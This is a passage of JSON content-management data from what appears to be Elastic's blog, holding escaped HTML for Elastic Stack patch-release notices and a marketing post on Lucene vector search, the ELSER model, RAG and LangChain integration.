delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csfcbc5155c4eee868"}}}],"publish_date":"2024-05-10","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltc3067ddccda555c1","ACL":{},"created_at":"2023-11-06T21:50:08.806Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elastic-cloud","label_l10n":"Elastic Cloud","tags":[],"title":"Elastic Cloud","updated_at":"2023-11-06T21:50:08.806Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.096Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[],"tags_topic":[{"title":"Community","label_l10n":"Community","keyword":"community","hidden_value":true,"tags":[],"locale":"en-us","uid":"blt9c74c5bb18c95a80","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-07-14T13:45:14.579Z","updated_at":"2020-07-14T13:45:14.579Z","_content_type_uid":"tags_topic","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-07-14T13:45:14.579Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-08-13T15:01:07.164Z","user":"bltc87e8bcd2aefc255"}}],"tags_use_case":[],"thumbnail_image":{"uid":"blt696883955f9c5c66","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-04-18T15:45:26.219Z","created_by":"blt96ac6007eba0a223","file_size":"154834","filename":"community-blog-series-04_(1)_(1).png","parent_uid":null,"tags":[],"title":"community-blog-series-04_(1)_(1).png","updated_at":"2024-04-18T15:45:26.219Z","updated_by":"blt96ac6007eba0a223","publish_details":{"time":"2024-04-19T07:38:52.718Z","user":"blt96ac6007eba0a223","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt696883955f9c5c66/66214016b8b5ce078fdbef6e/community-blog-series-04_(1)_(1).png"},"title":"DevRel newsletter — May 10, 2024","title_l10n":"DevRel newsletter — May 10, 2024","updated_at":"2025-01-21T18:34:00.991Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/devrel-newsletter-may-10-2024","publish_details":{"time":"2025-01-21T18:34:04.719Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt9c54c72d0fade9a3","_version":2,"locale":"en-us","ACL":{},"abstract_l10n":"Read about the updates and bug fixes that have been included in this release.","author":["blt469efe6417174bf5"],"category":["bltfaae4466058cc7d6"],"created_at":"2025-01-21T16:56:12.160Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csaa0b53b86ffe3ef7"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eVersion 8.17.1 of the Elastic Stack was released today. We recommend you \u003c/span\u003e\u003ca href=\"https://www.elastic.co/downloads\"\u003e\u003cspan style='font-size: 12pt;'\u003eupgrade to this latest version\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. We recommend 8.17.1 over the previous version 8.17.0.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor details of the issues that have been fixed and a full list of changes for each product in this version, please refer to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/starting-with-the-elasticsearch-platform-and-its-solutions/8.17/new.html\"\u003e\u003cspan style='font-size: 12pt;'\u003ethe release notes\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cse3bc2e15c7a02055"}}}],"publish_date":"2025-01-21","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"blt8836a5dda86cbfe0","_version":1,"created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-04-01T15:42:09.734Z","updated_at":"2024-04-01T15:42:09.734Z","content_type":"image/png","file_size":"62454","filename":"Patch_release_dark.png","title":"Patch_release_dark.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-04-02T17:14:25.081Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8836a5dda86cbfe0/660ad5d11b5a5878c8adccbc/Patch_release_dark.png"},"title":"Elastic Stack 8.17.1 released","title_l10n":"Elastic Stack 8.17.1 released","updated_at":"2025-01-21T16:57:08.052Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-stack-8-17-1-released","publish_details":{"time":"2025-01-21T17:06:49.148Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt583875f91d5b120c","_version":1,"locale":"en-us","ACL":{},"abstract_l10n":"Read about the updates and bug fixes that have been included in this release.","author":["blt469efe6417174bf5"],"category":["bltfaae4466058cc7d6"],"created_at":"2025-01-21T16:53:30.596Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eVersion 8.16.3 of the Elastic Stack was released today. We recommend you \u003c/span\u003e\u003ca href=\"https://www.elastic.co/downloads\"\u003e\u003cspan style='font-size: 12pt;'\u003eupgrade to this latest version\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. We recommend 8.16.3 over the previous version 8.16.2.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor details of the issues that have been fixed and a full list of changes for each product in this version, please refer to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/starting-with-the-elasticsearch-platform-and-its-solutions/8.16/new.html\"\u003e\u003cspan style='font-size: 12pt;'\u003ethe release notes\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e","_metadata":{"uid":"cs34d4273f8daab25d"}}],"_metadata":{"uid":"cs00de9eb1e4491b11"}}}],"publish_date":"2025-01-21","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"blt720a36f34ba37235","_version":1,"created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-04-08T02:19:40.632Z","updated_at":"2024-04-08T02:19:40.632Z","content_type":"image/png","file_size":"59668","filename":"Patch_release_white.png","title":"Patch_release_white.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-04-08T20:16:44.015Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt720a36f34ba37235/6613543c0d99458bb1031dca/Patch_release_white.png"},"title":"Elastic Stack 8.16.3 released","title_l10n":"Elastic Stack 8.16.3 released","updated_at":"2025-01-21T16:53:30.596Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-stack-8-16-3-released","publish_details":{"time":"2025-01-21T17:07:00.209Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltc08afab7cf86ee84","_version":15,"locale":"en-us","ACL":{},"abstract_l10n":"Elastic is the best developer platform for building AI search and generative AI apps with expanded ecosystem partners, full document vector search, a proprietary ML model for semantic search now in GA, and a simple API-first developer experience. ","author":["blt6f8c1e29600b488b"],"category":[],"created_at":"2023-11-30T15:44:11.111Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs9dc013da917071ff"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn this blog, we want to share the investments that Elastic® is making to simplify your experience as you build AI applications. We know that developers have to stay nimble in today’s fast-evolving AI environment. Yet, common challenges make building generative AI applications needlessly rigid and complicated. To name just a few:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eVectors — from how many to which ones you can use and how to chunk large passages of text\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eEvaluating, swapping, and managing large language models (LLMs)\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSetting up effective semantic search (particularly if your development team has limited resources or skill gaps)\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLeveraging existing investments and current architectures while balancing tech debt\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eScaling from proof-of-concept to production\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eMaking sure that end-user applications are fast and cost-effective and reflect secure, up-to-date proprietary data in responses to queries\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFragmented and complex implementation\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFlexible tools help you adapt quickly, respond to changes, and accelerate your projects. This is why Elastic is building on its foundation in Apache Lucene to offer the best open code vector database and search engine available. Elastic is also actively partnering across the ecosystem to expand support for transformer and foundation models.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eMoreover, we’re making it easier to get highly relevant semantic search out of the box with Elastic’s proprietary Learned Sparse EncodeR model, ELSER — now in GA. We’re reducing the costs and processing time associated with retrieval augmented generation (RAG), the retrieval process that provides relevant responses to natural language queries from proprietary data sources to LLMs, for custom use cases. And, we’re streamlining the developer experience across Elasticsearch®, so that implementation is simple and straightforward.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eDevelopers are actively shaping the future of generative AI apps. Elastic’s ground-breaking investments (and many more to come) reflect why our AI-powered search analytics platform is the best choice for a new generation of search workloads.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"All in on Apache Lucene","_metadata":{"uid":"cs03d7b75b1a159737"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIt all started with \u003c/span\u003e\u003ca href=\"https://www.elastic.co/celebrating-lucene\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eApache Lucene\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, an open source search engine software library that has stood the test of time and provides the basis for Elasticsearch. While Elasticsearch has grown to be recognized as the most downloaded vector database with its innovations in vector search, scalability, and performance, the strength of our platform originates from the fact that Elastic and Lucene’s communities invest in these advancements in Apache Lucene first. In fact, Elastic has a history of enhancing Lucene’s capabilities, such as numeric and geospatial search capabilities, Weak AND support, and improved columnar storage. Advancing the Lucene community means everyone goes farther, faster. Being the driver for these investments means Elastic users receive the value first, tailored to their search needs.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAt Elastic, we know that Lucene has potential beyond full-text search: developers need a full scope of features to build search apps and generative AI experiences including aggregations, filtering, faceting, etc. Ultimately we are on track to make Lucene the most leading-edge vector database in the world and to share its capabilities with millions of Elasticsearch users across the globe. That’s why Elastic’s developers regularly commit code to Lucene and leverage its foundational code for new projects, such as:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/search-labs/lucene-bringing-maximum-inner-product-to-lucene\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBringing maximum-inner-product to Lucene\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/blog/accelerating-vector-search-simd-instructions\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAccelerating vector search with SIMD instructions\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/search-labs/adding-passage-vector-search-to-lucene\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eDelivering full document vector search for allowing documents to have multiple vectors within one field, ranked by the most similar vectors\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e — handling the complexity of properly scoring vectors derived from long passages of text in order to address a common challenge — maintaining the overall context of large documents when using text embeddings\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/articles/vector-similarity-computations-fma-style\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eFused Multiply-Add (FMA) in Lucene\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSince Elasticsearch is built on top of Lucene, when you \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/whats-new-elasticsearch-platform-8-11-0\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eupgrade to our latest release\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, you automatically benefit from all of the latest improvements. And we’ve already started to contribute the next foundational investments our customers will need by adding \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/scalar-quantization-in-lucene\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003escalar quantization support to Lucene\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, a key cost savings capability.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Second to none in semantic search and RAG","_metadata":{"uid":"cscd3aae40d3f634a2"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eDevelopers are tasked with building search and generative AI applications that are relevant, performant, and cost-effective. Quite simply, you need to be able to retrieve data from all your proprietary data sources to build RAG to deliver the best, most pertinent results. To that end, we’ve added \u003ca href=\"https://www.elastic.co/enterprise-search/data-ingestion\" target=\"_self\"\u003emore native connectors and connector clients\u003c/a\u003e for enterprise databases and popular productivity tools, and content sources like OneDrive, Google Drive, GitHub, ServiceNow, Sharepoint, Teams, Slack, and plenty of others.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eEven more notably with \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/whats-new-elasticsearch-platform-8-11-0\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic’s 8.11 release\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, we’ve announced the general availability of Elastic Learned Sparse EncodeR (ELSER). It’s our proprietary AI model for delivering world-class semantic search. ELSER is a pre-trained, text retrieval model that provides highly relevant results across domains and lets you implement semantic search by \u003c/span\u003e\u003ca href=\"https://www.elastic.co/getting-started/enterprise-search/build-a-semantic-search-experience\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003efollowing a few simple steps\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. Since \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/may-2023-launch-announcement\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eits technical preview in May\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, ELSER has had wide adoption, allowing us to make improvements based on customer feedback. Our GA ELSER model brings increased relevance and reduced ingest and retrieval time. You can \u003c/span\u003e\u003ca href=\"https://github.com/elastic/elasticsearch-labs/blob/bc36bfa5d1ce56dc1e7412bc8a91db5ba1c36751/notebooks/model-upgrades/upgrading-index-to-use-elser.ipynb\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eupgrade now\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e to take advantage of these enhancements.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAnother obstacle that comes with generative AI territory: higher compute costs and slower response times. Generative LLM calls incur costs per token and require additional processing, which takes time. However, with the power of embeddings and fast k-Nearest Neighbors algorithms (kNN), Elastic can be used as a \u003c/span\u003e\u003ca href=\"https://elastic.co/search-labs/elasticsearch-as-a-genai-caching-layer\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ecaching layer for generative AI applications\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, readily identifying similar queries and responses and providing quicker, more cost-effective answers. With respect to cost efficiencies, \u003c/span\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003eon AWS, we now also offer \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-default-aws-configurations.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ea vector search optimized Elastic Cloud hardware profile\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003e with an optimal default RAM ratio for a price effective ability to store more vectors.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe better Elastic is at making semantic search and RAG simple to use together, the faster developers can make great generative AI experiences for end users. That’s why we’re laser-focused on making the technology easy and practical for developers to use.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Choice and flexibility across the ecosystem","_metadata":{"uid":"csfff1115bf6ca1b09"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHelping you respond to change quickly in the AI era with an open platform where you can use a variety of tools and consistent standards is key to accelerating generative AI projects. That’s why developers have flexibility to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/may-2023-launch-machine-learning-models\"\u003e\u003cspan style='font-size: 12pt;'\u003euse and host a variety of transformer models\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e within Elasticsearch, including private and public \u003c/span\u003e\u003ca href=\"https://www.docker.elastic.co/r/eland/eland:latest\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eHugging Face models\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. You can also store vectors in Elasticsearch generated by third-party services like AWS SageMaker, Google Vertex AI, Cohere, OpenAI, and more.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe’re also expanding our support for ecosystem tools so you can easily use Elasticsearch as your \u003c/span\u003e\u003ca href=\"https://integrations.langchain.com/vectorstores\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003evector database with LangChain\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and \u003c/span\u003e\u003ca href=\"https://gpt-index.readthedocs.io/en/stable/examples/vector_stores/ElasticsearchIndexDemo.html\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eLlamaIndex\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eIn fact, we recently collaborated with the LangChain team on \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elasticsearch-langchain-production-ready-rag-templates\"\u003e\u003cspan style='font-size: 12pt;'\u003eLangChain Templates\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to help developers build production-ready generative AI apps. Thanks to our community, Elastic is already one of the most popular vector stores on LangChain. Now with the new \u003c/span\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/tree/master/templates/rag-elasticsearch\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eRAG template\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, you can create production-level capabilities with LangSmith and Elasticsearch.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"A simple developer experience","_metadata":{"uid":"csc21a1d6dd4ca9322"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWe’re dedicated to creating a simplified developer experience. We’re releasing streamlined commands that abstract away the complexity of inference and model management work streams that you can use behind one simple API. We’re improving default settings for dense vectors and providing automatic mappings too. With one call, you can summarize results or embed text as vectors from any model, reducing the time it takes for you to build and learn.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSoon, we’ll introduce \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-serverless-architecture\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic’s new serverless architecture\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, a new deployment option for developers who want to focus on creating innovative experiences, not managing their underlying infrastructure. We’re focused on giving you all of the tools you need, so we’re adding new language clients in our serverless architecture for Python, PHP, JavaScript, Ruby, Java, .Net, and Go.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWe’re also well aware that it can be challenging to get started with fast-changing, new technologies, which is why we’re offering simple onboarding with inline guidance and code across every one of Elastic’s deployment options, including \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/examples\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ereal-world examples\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e to help you spin up new projects quickly.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThere’s never been a better time to be an Elasticsearch developer. Our recent research and development efforts are making Lucene the best vector database in the world. We’re ensuring that semantic search and RAG are unparalleled when it comes to ease of use, relevance, speed, scale, and cost efficiency. And we’re putting ecosystem openness, flexibility, and simplicity at the heart of developer experience.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eReady to start building next-generation search on Elasticsearch? Try the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/esre/current/index.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElasticsearch Relevance Engine™\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, our suite of developer tools for building AI search apps.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csd79b48f52edf80b5"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs8fc82eec8399be72"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs8fed689b9137958b"}}}],"publish_date":"2023-11-30","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"Elastic’s innovative investments to support an open ecosystem and a simpler developer experience","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt02ec7fa8864f17dd","_version":1,"created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2023-11-30T16:18:30.450Z","updated_at":"2023-11-30T16:18:30.450Z","content_type":"image/png","file_size":"155558","filename":"elastic-de-135742-blogheader-pav_V1.png","title":"elastic-de-135742-blogheader-pav_V1.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2023-11-30T20:27:48.736Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt02ec7fa8864f17dd/6568b5d67c56dd34b8a618b4/elastic-de-135742-blogheader-pav_V1.png"},"title":"Paving the way for modern search workflows and generative AI apps","title_l10n":"Paving the way for modern search workflows and generative AI apps","updated_at":"2025-01-17T22:07:55.004Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/modern-search-workflows-generative-ai-apps","publish_details":{"time":"2025-01-17T22:08:00.713Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltac740155cb532e03","_version":14,"locale":"en-us","ACL":{},"abstract_l10n":"Elastic Platform 8.14 includes ES|QL GA, the use of AI for pattern recognition in logs, API key based security model for remote clusters, encryption at rest with KMS keys, retrievers, several vector optimizations, and vector quantization by default.","author":["bltb072e15a3a1f5460","bltd5cf63a83ace2eb7","bltd40b1c822e24d3a9","blt80b226b35f93d8c4","blt66fc5c9958656092","blt175bbd896586795b","bltccf9c2c3a662296d"],"category":["bltfaae4466058cc7d6"],"created_at":"2024-05-30T17:48:44.251Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs915819442c878d4b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 